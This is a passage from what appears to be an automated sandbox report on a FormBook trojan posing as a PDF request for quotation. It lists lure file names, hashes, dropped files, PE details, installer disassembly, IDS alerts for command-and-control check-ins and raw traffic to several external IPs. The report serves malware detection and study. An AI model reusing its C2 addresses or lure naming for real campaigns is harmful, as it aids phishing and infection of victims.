                                                                      2021-04-01.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      onbgX3WswF.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      PO.1183.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                      • 199.59.242.153
                                                                      BIZLAND-SDUSPaymentAdvice.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.131
                                                                      Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.128
                                                                      46578-TR.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.136
                                                                      RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
                                                                      • 66.96.161.160
                                                                      PO91361.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.129
                                                                      56_012021.docGet hashmaliciousBrowse
                                                                      • 66.96.149.32
                                                                      RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                      • 207.148.248.143
                                                                      W88AZXFGH.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.131
                                                                      Purchase Orders.exeGet hashmaliciousBrowse
                                                                      • 65.254.248.81
                                                                      02B56iRnVM.exeGet hashmaliciousBrowse
                                                                      • 209.59.219.1
                                                                      Swift 76498,pdf.exeGet hashmaliciousBrowse
                                                                      • 66.96.134.26
                                                                      new built.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.131
                                                                      BL Draft copy.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.128
                                                                      PaymentInvoice.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.131
                                                                      SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.131
                                                                      bank details.exeGet hashmaliciousBrowse
                                                                      • 65.254.248.81
                                                                      Payment_png.exeGet hashmaliciousBrowse
                                                                      • 66.96.160.133
                                                                      salescontractv2draft.exeGet hashmaliciousBrowse
                                                                      • 66.96.162.149
                                                                      orders.exeGet hashmaliciousBrowse
                                                                      • 65.254.248.81
                                                                      Order-PO-0186500.exeGet hashmaliciousBrowse
                                                                      • 207.148.248.143
                                                                      ASN-QUADRANET-GLOBALUSPayment Slip.exeGet hashmaliciousBrowse
                                                                      • 192.161.187.200
                                                                      ORDER343346PO3455.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      PO987633ORDER443REQUEST.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER93949394.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER34543REQUEST34444PO.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER34543REQUEST34444PO343.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER03094838493.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER0039484#PO.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      PO#ORDER937743.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      ORDER33439484#PO.exeGet hashmaliciousBrowse
                                                                      • 172.93.187.249
                                                                      SWIFTCOPY_110255293303484_SANTANDER.docGet hashmaliciousBrowse
                                                                      • 185.174.101.41
                                                                      SbdCFa6pNAGet hashmaliciousBrowse
                                                                      • 173.254.217.214
                                                                      approved new order_April TT181.docGet hashmaliciousBrowse
                                                                      • 185.174.101.41
                                                                      OC CVE9362 _TVOP-MIO 24.docGet hashmaliciousBrowse
                                                                      • 185.174.101.41
                                                                      n74DqoAGos.exeGet hashmaliciousBrowse
                                                                      • 173.44.50.137
                                                                      r74BL8gyil.exeGet hashmaliciousBrowse
                                                                      • 173.44.50.137
                                                                      89OdCS5Qeu.exeGet hashmaliciousBrowse
                                                                      • 161.129.66.224
                                                                      tcYgoJHJSgGet hashmaliciousBrowse
                                                                      • 173.254.217.214
                                                                      vdaiygLkjHGet hashmaliciousBrowse
                                                                      • 173.254.217.214
                                                                      4i1GUIgglX.exeGet hashmaliciousBrowse
                                                                      • 192.161.48.5

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\7di05goozxs8
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):164864
                                                                      Entropy (8bit):7.998854864246748
                                                                      Encrypted:true
                                                                      SSDEEP:3072:d44peOnn7lgGgQgnGV5PLwDXnhgPKCUbRn0Ga7TY6EcH5w+lETIF7:DQOnn7UGV5wD3hbCQ0Ga7BjHVLF7
                                                                      MD5:D7088EEF0E87F0C50D1AD0DFB884F8DA
                                                                      SHA1:519B7075E47497CB94E28808C8D47DA194894FA1
                                                                      SHA-256:306DCF3EF4DBEE61EA91FF787766B702E9805A96621EB75691E4A879A9A50C0D
                                                                      SHA-512:5A0D8BA54187CE1F6692143FACC7773A7F1C3415FFB822F54067961CFD311877E71147D0A64130C624D664940BE56907147CFB4853E79F8FCEE4BC48434723E2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: |..8....cE=L...0......\$nU..n.'iY,.I...j..Q..!...q9..V...f*.fnj.A..Un..<.~R....CC*..,c..|\4..5.h+.U.......Q.>.+..k..|.`^iS.....uV.L...~.L...............K.:...[..."b..1.XHt.....,6.<....'.X..w|w.......$(..@.L.{d3.....)..)..yO,....8Oo...;._L..z....eF_./...=....D.P...M..4.U....%5.X(...&..2..!...D..a..r.z-.2.I....r..*d....A.2....~&[.hk...M..v*)P.....Ff.G......vM?;J1a.....$....2...r*.bF...h.l.~..$-Lc..}aj.u......&.,.6.].-S..\e..+.D....ge..;. ....$.&"..'r...P.c.5._...ls.+....5}....N.[(.T.k...`...p..u.i....b....y;..".k..\H.1.q+...I.5X..x...=.j.tiV...MC.I.k...=....mGh.....}.s.M.N..0....\..".]`.t.F.*~.t.......X../.-X..Sq.HPk+_.x.nv..).....K..._a..m....N..<.....i..B.(.`}.\F.m.........W:1.W.0Z...<.......0..i,|.....k...M...(n...w\.7..{V..D.{.].....`.t`.HBz..".......7Z..p..u^.."2..O.._....EE....Ji.........H.x..aD...`/.qy.......!.6L.@3....}.F.-"..!....M.T.u....E......H!5M..A...pk./.....J....._..>>.T{,.....Dv!...O_9..4}H........l./.U.8..K#..4O...rh`^<....Ma`DI_..
                                                                      C:\Users\user\AppData\Local\Temp\dax13un2d6
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6661
                                                                      Entropy (8bit):7.956656063967567
                                                                      Encrypted:false
                                                                      SSDEEP:96:RKgkqsL2kJtjh68QB/riIEfOnL5sYoKP3BRO1PKd/S9chyHhfJ60WMLRFG/0sxYw:RDkqsNHG/cmnL5suvBROewQ4vLY0UsA
                                                                      MD5:30B449A67F91AF95CA2D7F6724868805
                                                                      SHA1:7AB0F79DC27576D0B670D1F0CA62827DF08C95C2
                                                                      SHA-256:35BF779A878919C60AABBFB59E9DD2935ACFB560B47C2DD6798535BDF1A27DD2
                                                                      SHA-512:087C45FDC0A3998CE02B9F23F90D0BF38F2E1F904B2785D93F8A992B392F91B255901B1558430FBEBFE8C3178E460FF7F9A3D2641DE644AA532929B11B112A05
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: a.mw;v....C.........8...'.....5........@.y<5.P....K..&....Q.....!*..t7.+.K......Z.\....2Y.....aP.4)=A].......W..._.....KRJ.p8.h...5..K.....2...N..6D.R.\^b.`...E.s... .n.l........."..\....do...P.M.....L..j..=..~.@n..}...'9..2..t.O.D.uaUsk]4../........t.l.z[...k/...g.l..D..=.(.9..<?.-...REj...[Wf....y.6pP...T.ot.z..l.n...?.>l.n....Ph%n...Q8....P..6.o..s..d.....hU-...`..O.LV.jC9b..............|<..!...=}. _..F`.'..A......u4.k..q...7s..Q..'I..Be{...83.iy..].8Ax... .d.t.~..qu'L....|[..?..1\...h.=.N..b./.z.7*.....Z..Q..~[..-.W..`...rVL...zQ...S*.wg..KI)...........M6.0.:.M.q.q8/.*...9.."....Ko...d[.r. 4F..4g.T}..v.l....%)....N.T.p...>|.y..r..=....nI....C...$....L..BLl....*0.h.M.&a..b.J....M/..@n).}.......!.....Y[.._...y.....B.....v.....<.Im."....B.V..Ly..&.F.P9....1C......4z.Xl.5..O.o..R.7...$...R.5..J"..Y.jM..Qo..nR.`..~9.W.....3T...#QE9...U..#....o(.....K....N........M....vn".I.`.k.;^....H.......\....#..:Pj.C<.y....Q.B.Qz.=...K...
                                                                      C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):5120
                                                                      Entropy (8bit):4.185149071228919
                                                                      Encrypted:false
                                                                      SSDEEP:48:StV2Zq6NN8MD5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqSgSnM:oRo5yZUGXHBgVueKxbSM
                                                                      MD5:BA2AD591CE772A5D280C3F20D6A42998
                                                                      SHA1:CA6C574F5F1CB219754EA06459B3039E96A2D6C9
                                                                      SHA-256:5EB2CA7EF67E0748B9ED095660F89B0FE7972C30CB06F56D05E75C0899305831
                                                                      SHA-512:7C193F004FF41411E9F68A592EF9E2C34EA67F8B5C4F866A1E1EEEB7385E0151DD8ECBBFBA0B1485222323DFD6836F69C5CDFDA5B4CD927B7D42FA9F1DEB115D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 23%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...JEn`...........!......................... ...............................`............@......................... !..T...`".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..0.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.33175373329671
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File size:397431
                                                                      MD5:98f9ea244308bb5969ea3c302c32efcd
                                                                      SHA1:82a913894418af7834d23bc543eb286230d4edf4
                                                                      SHA256:cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
                                                                      SHA512:c300afa9a46ca0c9d12c395c90c7bcd1950513780d4fd3775525a4f431319e16504ee3ee2411050a48810b94eb29f3c9ee84ad8c6efd2460280c7091a5923847
                                                                      SSDEEP:6144:Dd9stvLGtELbMUTKZXQOnn7UGV5wD3hbCQ0Ga7BjHVLF7R:bSityjKzn7Uw5wD3hbQBRFN
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....<.....J1.....

                                                                      File Icon

                                                                      Icon Hash:929296929e9e8eb2

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x40314a
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 0000017Ch
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      xor esi, esi
                                                                      push edi
                                                                      mov dword ptr [esp+18h], esi
                                                                      mov ebp, 00409240h
                                                                      mov byte ptr [esp+10h], 00000020h
                                                                      call dword ptr [00407030h]
                                                                      push esi
                                                                      call dword ptr [00407270h]
                                                                      mov dword ptr [007A3030h], eax
                                                                      push esi
                                                                      lea eax, dword ptr [esp+30h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push esi
                                                                      push 0079E540h
                                                                      call dword ptr [00407158h]
                                                                      push 00409230h
                                                                      push 007A2780h
                                                                      call 00007FA370EE84D8h
                                                                      mov ebx, 007AA400h
                                                                      push ebx
                                                                      push 00000400h
                                                                      call dword ptr [004070B4h]
                                                                      call 00007FA370EE5C19h
                                                                      test eax, eax
                                                                      jne 00007FA370EE5CD6h
                                                                      push 000003FBh
                                                                      push ebx
                                                                      call dword ptr [004070B0h]
                                                                      push 00409228h
                                                                      push ebx
                                                                      call 00007FA370EE84C3h
                                                                      call 00007FA370EE5BF9h
                                                                      test eax, eax
                                                                      je 00007FA370EE5DF2h
                                                                      mov edi, 007A9000h
                                                                      push edi
                                                                      call dword ptr [00407140h]
                                                                      call dword ptr [004070ACh]
                                                                      push eax
                                                                      push edi
                                                                      call 00007FA370EE8481h
                                                                      push 00000000h
                                                                      call dword ptr [00407108h]
                                                                      cmp byte ptr [007A9000h], 00000022h
                                                                      mov dword ptr [007A2F80h], eax
                                                                      mov eax, edi
                                                                      jne 00007FA370EE5CBCh
                                                                      mov byte ptr [esp+10h], 00000022h
                                                                      mov eax, 00000001h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x2f05b.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x3ac0000x2f05b0x2f200False0.36241089191data6.22523060047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x3ac3100x709ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0x3b33b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512
                                                                      RT_ICON0x3c3bd80x94a8data
                                                                      RT_ICON0x3cd0800x5488data
                                                                      RT_ICON0x3d25080x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512
                                                                      RT_ICON0x3d67300x25a8data
                                                                      RT_ICON0x3d8cd80x10a8data
                                                                      RT_ICON0x3d9d800x988data
                                                                      RT_ICON0x3da7080x468GLS_BINARY_LSB_FIRST
                                                                      RT_DIALOG0x3dab700x100dataEnglishUnited States
                                                                      RT_DIALOG0x3dac700x11cdataEnglishUnited States
                                                                      RT_DIALOG0x3dad8c0x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x3dadec0x84data
                                                                      RT_MANIFEST0x3dae700x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                      USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                      SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      04/08/21-13:22:17.851992TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:17.851992TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:17.851992TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:23.881720TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:23.881720TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:23.881720TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:50.107975TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:50.107975TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:50.107975TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:55.232579TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.232579TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.232579TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.347369TCP1201ATTACK-RESPONSES 403 Forbidden804977434.102.136.180192.168.2.4
                                                                      04/08/21-13:23:23.204497ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                      04/08/21-13:23:24.222015ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                      04/08/21-13:23:26.237204ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 8, 2021 13:22:07.208076954 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.318911076 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.319055080 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.319251060 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.437031031 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443166971 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443207026 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443396091 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.443444014 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.554378986 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:17.702614069 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851721048 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:17.851872921 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851991892 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.994587898 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.359489918 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:18.542831898 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669209003 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669230938 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669306040 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:18.669331074 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:23.712862968 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881352901 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:23.881531954 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881720066 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:24.249051094 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:24.391254902 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:24.557790995 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418097019 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418112040 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418188095 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:27.418340921 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:44.781671047 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:44.891897917 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:44.892003059 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:44.892147064 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.002394915 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002899885 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002926111 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002974033 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002993107 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003007889 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003110886 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003139019 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003252983 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:50.074331045 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107506990 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.107790947 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107975006 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.139882088 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173912048 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173933983 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.174128056 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.174240112 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.206252098 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:55.219860077 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232299089 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.232404947 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232578993 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.245090008 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347368956 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347384930 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347610950 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.361360073 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:23:00.419142962 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599010944 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.599234104 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599381924 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.779186964 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805794001 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805819988 CEST8049776184.168.131.241192.168.2.4
